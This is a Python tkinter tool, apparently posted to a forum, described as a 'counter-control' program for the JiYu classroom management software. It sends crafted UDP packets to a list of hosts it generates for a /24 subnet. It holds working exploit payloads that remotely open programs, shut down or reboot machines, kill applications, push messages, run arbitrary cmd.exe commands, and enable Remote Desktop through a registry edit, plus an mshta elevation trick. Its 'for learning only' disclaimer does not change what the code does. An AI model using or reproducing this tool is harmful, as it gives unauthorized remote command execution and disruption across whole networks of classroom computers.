import tkinter as tk
import socket
def send_hack():
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if v.get() == 1:
payload = "444d4f43000001006e030000d105ef0f2ea4524fa811eb311b859236204e0000c0a803fe610300006103000000020000000000000f0000000100000043003a005c00570069006e0064006f00770073005c00730079007300740065006d00330032005c004e004f00540045005000410044002e0045005800450000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000"
elif v.get() == 2:
payload = "444d4f43000001002a020000ae405669f33bab44b41006b4ee978d2b204e0000c0a803fe1d0200001d0200000002000000000000140000100f00000001000000000000005965085e065c7351ed95a8608476a18b977b3a670230000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
elif v.get() == 3:
payload = "444d4f43000001002a02000041d71dd603610f4db08d89c5aaa2b501204e0000c0a814841d0200001d0200000002000000000000130000100f00000001000000000000005965085e065ccd912f54a8608476a18b977b3a670230000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
elif v.get() == 4:
payload = "444d4f43000001002a02000022a5fc1805afff4680b30072ccdbdd41204e0000c0a814841d0200001d0200000002000000000000130000000f0000000100000000000000d19ea25b065ccd912f54a8608476a18b977b3a670230000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
elif v.get() == 5:
payload = '444d4f43000001002a020000219362685cfc1743846d5cc258953aa9204e0000c0a814841d0200001d0200000002000000000000020000000f0000000100000000000000d19ea25b065c7351ed95a8608476945e28750b7a8f5e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
payload_bytes = bytes.fromhex(payload)
f = open("host.txt", "r")
lines = [line for line in f]
for line in lines:
ip = line.strip()
print(ip)
udp_socket.sendto(payload_bytes, (f"{ip}", p.get()))
print('命令执行完成!')
udp_socket.close()
def send_message():
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bian = data.get().encode('unicode-escape')
ack =str(bian)
ack = ack.split(r'\\u')
del ack[0]
send_payload = ""
for i in ack:
send_payload += i[2] + i[3] + i[0] + i[1]
payload = f'444d4f43000001009e030000dc79fabb169ec04ca009db380f7f34ee204e0000c0a803fe9103000091030000000800000000000005000000{send_payload}00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
payload_bytes = bytes.fromhex(payload)
f = open("host.txt", "r")
lines = [line for line in f]
for line in lines:
ip = line.strip()
print(ip)
udp_socket.sendto(payload_bytes, (f"{ip}", p.get()))
print('消息已发送完成!')
udp_socket.close()
def send_cmd():
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s=cmd.get()
s_hex = ""
for i in range(len(s)):
if i == ' ':
s_hex += '20'
s_hex = s_hex + hex(ord(s[i]))[2:] + "00"
payload = f'444d4f43000001006e0300008e44dcfa94cc8a4ba5fffa49b0caa95f204e0000c0a81484610300006103000000020000000000000f0000000100000043003a005c00570069006e0064006f00770073005c00730079007300740065006d00330032005c0063006d0064002e0065007800650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002f006b002000{s_hex}00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000'
payload_bytes = bytes.fromhex(payload)
f = open("host.txt", "r")
lines = [line for line in f]
for line in lines:
ip = line.strip()
print(ip)
udp_socket.sendto(payload_bytes, (f"{ip}", p.get()))
print('命令已发送完成!')
udp_socket.close()
def saomiao():
zj_list =srip.get()
print(zj_list)
qg_list = zj_list.split('.')
print(qg_list)
for i in range(1,255):
with open('host.txt', 'a') as f:
yz_list = str(qg_list[0]),str(qg_list[1]),str(qg_list[2]),str(i)
ip_list = ''
ip_list = yz_list[0]+'.'+yz_list[1]+'.'+yz_list[2]+'.'+yz_list[3]
f.write(ip_list+'\n')
f.close()
import tkinter.messagebox
tkinter.messagebox.showinfo('一键生成', '生成完成!已在当前目录下创建host.txt文件!')
def jcgx():
import tkinter.messagebox
tkinter.messagebox.showinfo('检查更新', '最新版软件下载网址:www.lenglin.xyz 店铺公告中!')
def kq_yczm():
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s = '''REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'''
s_hex = ""
for i in range(len(s)):
if i == ' ':
s_hex += '20'
s_hex = s_hex + hex(ord(s[i]))[2:] + "00"
payload = f'444d4f43000001006e0300008e44dcfa94cc8a4ba5fffa49b0caa95f204e0000c0a81484610300006103000000020000000000000f0000000100000043003a005c00570069006e0064006f00770073005c00730079007300740065006d00330032005c0063006d0064002e0065007800650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002f006b002000{s_hex}00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000'
payload_bytes = bytes.fromhex(payload)
f = open("host.txt", "r")
lines = [line for line in f]
for line in lines:
ip = line.strip()
print(ip)
udp_socket.sendto(payload_bytes, (f"{ip}", p.get()))
print('命令已发送完成!')
def lx_kfz():
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s = '''%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit cd /d "%~dp0"
@echo off
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'''
s_hex = ""
for i in range(len(s)):
if i == ' ':
s_hex += '20'
s_hex = s_hex + hex(ord(s[i]))[2:] + "00"
payload = f'444d4f43000001006e0300008e44dcfa94cc8a4ba5fffa49b0caa95f204e0000c0a81484610300006103000000020000000000000f0000000100000043003a005c00570069006e0064006f00770073005c00730079007300740065006d00330032005c0063006d0064002e0065007800650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002f006b002000{s_hex}00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000'
payload_bytes = bytes.fromhex(payload)
f = open("host.txt", "r")
lines = [line for line in f]
for line in lines:
ip = line.strip()
print(ip)
udp_socket.sendto(payload_bytes, (f"{ip}", p.get()))
print('命令已发送完成!')
# udp_socket.close()
root = tk.Tk()
root.title("冷麟极域课堂反控制程序") # 窗口标题
root.geometry("820x655+550+280") # 第一个值为窗口内部至左边框的距离,第二个参数为上边框至下部的距离,第三个参数为左边边框与屏幕的距离,第四个参数为上边框与屏幕的距离
tishi_1 = tk.Label(root, text='冷麟极域课堂反控制程序V3.0', bg='blue', fg='red', font=('黑体', 30)).place(x=150, y=15)
# 操作功能选项区域
tk.Label(root, text='请选择需要操作的功能:',font=('楷体',24),fg='blue').place(x=220,y=65)
v = tk.IntVar() # 设置关联变量
v.set(1) # 默认选打开记事本
open_notebook = tk.Radiobutton(root, text='打开记事本', variable=v,value=1,font='微软雅黑',fg='red').place(x=50,y=105)
shutdown = tk.Radiobutton(root, text='关机', variable=v, value=2,font='微软雅黑',fg='red').place(x=190,y=105,)
cq = tk.Radiobutton(root, text='强制重启', variable=v, value=3,font='微软雅黑',fg='red').place(x=280,y=105,)
ts_cq = tk.Radiobutton(root, text='提示重启', variable=v, value=4,font='微软雅黑',fg='red').place(x=395,y=105,)
kill_yycx = tk.Radiobutton(root, text='关闭所有应用程序', variable=v, value=5,font='微软雅黑',fg='red').place(x=515,y=105,)
# 版本选择区域
p = tk.IntVar()
p.set(4705) # 设置默认选项为2016版本
tk.Label(root, text='请选择极域课堂的版本(必选):',font=('楷体',18),fg='blue').place(x=10,y=140)
banben =tk.Radiobutton(root,text='2016版本',variable=p, value=4705,font=('微软雅黑',14),fg='red').place(x=460,y=140,)
banben_2 =tk.Radiobutton(root,text='2021版本',variable=p, value=4988,font=('微软雅黑',14),fg='red').place(x=580,y=140,)
banben_3 = tk.Radiobutton(root,text='2010版本',variable=p, value=4605,font=('微软雅黑',14),fg='red').place(x=335,y=140,)
# 确认执行区域
queren = tk.Button(root,text='执行',font=('楷体',30),fg='green',command=send_hack).place(x=700,y=106)
# 一键扫描
srip = tk.StringVar()
tk.Label(root, text='请输入生成的网段(192.168.20.0/24):',font=('楷体',18),fg='blue').place(x=10,y=190)
send_ml = tk.Entry(root, show=None,textvariable=srip,font=('楷体', 16)).place(x=425, y=190,height=40,width=200)
saomiao = tk.Button(root,text='一键生成',font=('楷体',26),fg='red',command=saomiao).place(x=640,y=180)
# 发送消息区域
data = tk.StringVar()
tk.Label(root, text='发送信息模块(仅支持中文):',font=('楷体',18),fg='blue').place(x=10,y=245)
tk.Label(root, text='2010版不支持!',font=('楷体',18),fg='blue').place(x=70,y=280)
send_data = tk.Entry(root, show=None,textvariable=data,font=('楷体', 20)).place(x=35, y=320,height=100,width=220)
send = tk.Button(root,text='发送',font=('楷体',30),fg='green',command=send_message).place(x=90,y=425)
tishi_5 = tk.Label(root, text='2021版不支持关闭极域!', bg='blue', fg='red', font=('黑体', 16)).place(x=262, y=280)
fan_kui = tk.Button(root,text='关闭极域',font=('楷体',24),fg='blue',command=lx_kfz).place(x=310,y=315)
yczm = tk.Button(root,text='开启远程桌面',font=('楷体',24),fg='blue',command=kq_yczm).place(x=280,y=378)
jc_gx = tk.Button(root,text='检查更新',font=('楷体',24),fg='blue',command=jcgx).place(x=310,y=440)
# 系统命令区域
cmd = tk.StringVar()
tk.Label(root, text='系统命令模块:',font=('楷体',18),fg='blue').place(x=510,y=280)
send_ml = tk.Entry(root, show=None,textvariable=cmd,font=('楷体', 20)).place(x=515, y=320,height=100,width=258)
send_2 = tk.Button(root,text='发送',font=('楷体',30),fg='green',command=send_cmd).place(x=585,y=425)
# 注意事项
tishi_2 = tk.Label(root, text='请在此目录下创建一个host.txt文件存放目标ip!一键生成只支持24位掩码!', bg='yellow', fg='green', font=('黑体',16)).place(x=40, y=510)
tishi_4 = tk.Label(root, text='一行一个,不要有空格!每个模块15秒可执行一次!', bg='yellow', fg='green', font=('黑体', 16)).place(x=148, y=540)
tishi_3 = tk.Label(root, text='此软件仅用于学习交流使用!不得用于任何非法或恶意破坏使用!', fg='red', font=('黑体', 20)).place(x=1, y=575)
tishi_7 = tk.Label(root, text='造成的后果由使用者自行承担!与软件开发者无关!', fg='red', font=('黑体', 20)).place(x=80, y=610)
root.mainloop()
gf25003 LV 4 @ 2026-3-27 18:32:45
